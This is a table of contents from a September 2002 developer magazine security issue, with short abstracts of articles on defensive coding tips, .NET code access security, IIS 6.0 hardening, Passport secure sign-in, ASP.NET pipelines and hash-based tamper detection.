September 2002

Security Tips: Defend Your Code with Top Ten Security Tips Every Developer Must Know

There are many ways to get into trouble when it comes to security. You can trust all code that runs on your network, give any user access to important files, and never bother to check that code on your machine has not changed. You can run without virus protection software, not build security into your own code, and give too many privileges to too many accounts. You can even use a number of built-in functions carelessly enough to allow break-ins, and you can leave server ports open and unmonitored. Obviously, the list continues to grow. What are some of the really important issues, the biggest mistakes you should watch out for right now so that you don't compromise your data or your system? Security experts Michael Howard and Keith Brown present 10 tips to keep you out of hot water. Michael Howard and Keith Brown

Security in .NET: The Security Infrastructure of the CLR Provides Evidence, Policy, Permissions, and Enforcement Services

The common language runtime of the .NET Framework has its own secure execution model that isn't bound by the limitations of the operating system it's running on. In addition, unlike the old principal-based security, the CLR enforces security policy based on where code is coming from rather than who the user is. This model, called code access security, makes sense in today's environment because so much code is installed over the Internet and even a trusted user doesn't know when that code is safe.In this article, Don Box explains how code access security works in the CLR. He discusses the kinds of evidence required by policy, how permissions are granted, and how policy is enforced by the runtime. Don Box

Security in IIS 6.0: Innovations in Internet Information Services Let You Tightly Guard Secure Data and Server Processes

Security improvements have been a top priority in the evolution of IIS. IIS 6.0, which will be part of Windows .NET Server, has improved security features and a new approach to server configuration. New security-related tools for IIS, including IIS LockDown, make securing your server against attack easier than ever. The author explains how and why you can shut down services with IIS LockDown. He discusses limiting port access with TCP/IP filtering, controlling how files are served with extension mapping, what's new for Secure Sockets Layer, the use of URLScan, and more. Wayne Berry

Passport Secure Sign-In: Provide Your Users with Secure Authentication Capabilities Using Microsoft .NET Passport

Secure sign-in, a new feature in version 2.0 of the .NET Passport single sign-in and profile service, is a functionality that will be especially useful for sites containing confidential information or anywhere security is a primary concern. Such sites include banks, medical sites, and so on. Secure sign-in is as safe as any SSL-based Web site login used today and provides a way to virtually eliminate vulnerability to replay and dictionary attacks.This article explains secure sign-in and demonstrates how you can implement this feature with very little effort in either ASP using the Passport.Manager COM object or in ASP.NET using the .NET class PassportIdentity. Michael Kogotkov-Lisin

HTTP Pipelines: Securely Implement Request Processing, Filtering, and Content Redirection with HTTP Pipelines in ASP.NET

ASP.NET is a flexible and extensible framework for server-side HTTP programming. While most people think of ASP.NET in terms of pages served, there is a lower-level infrastructure sitting beneath this page model. The underlying plumbing is based on a pipeline of app, module, and handler objects. Understanding how this pipeline works is key if you want to get the most out of ASP.NET as an HTTP server platform, while making your process more efficient, and keeping your server secure. This article introduces the architecture of the pipeline and shows how you can use it to add sophisticated functionality to an ASP.NET-based app. Tim Ewald and Keith Brown

Tamper-Resistant Apps: Cryptographic Hash Algorithms Let You Detect Malicious Code in ASP.NET

Cryptographic hash algorithms produce fixed-length sequences based on input of arbitrary length. A given input always produces the same output, called a hash code. Using these algorithms, you can compute and validate hash codes to ensure that code running on your machine has not been tampered with or otherwise changed. ASP.NET provides a software mechanism for validating hash code fingerprints for every page requested by a client. In this article, the author shows how to use hash codes with ASP.NET applications to detect tampering and prevent malicious code from running when tampering is detected. Jason Coombs

(246 KB)

Columns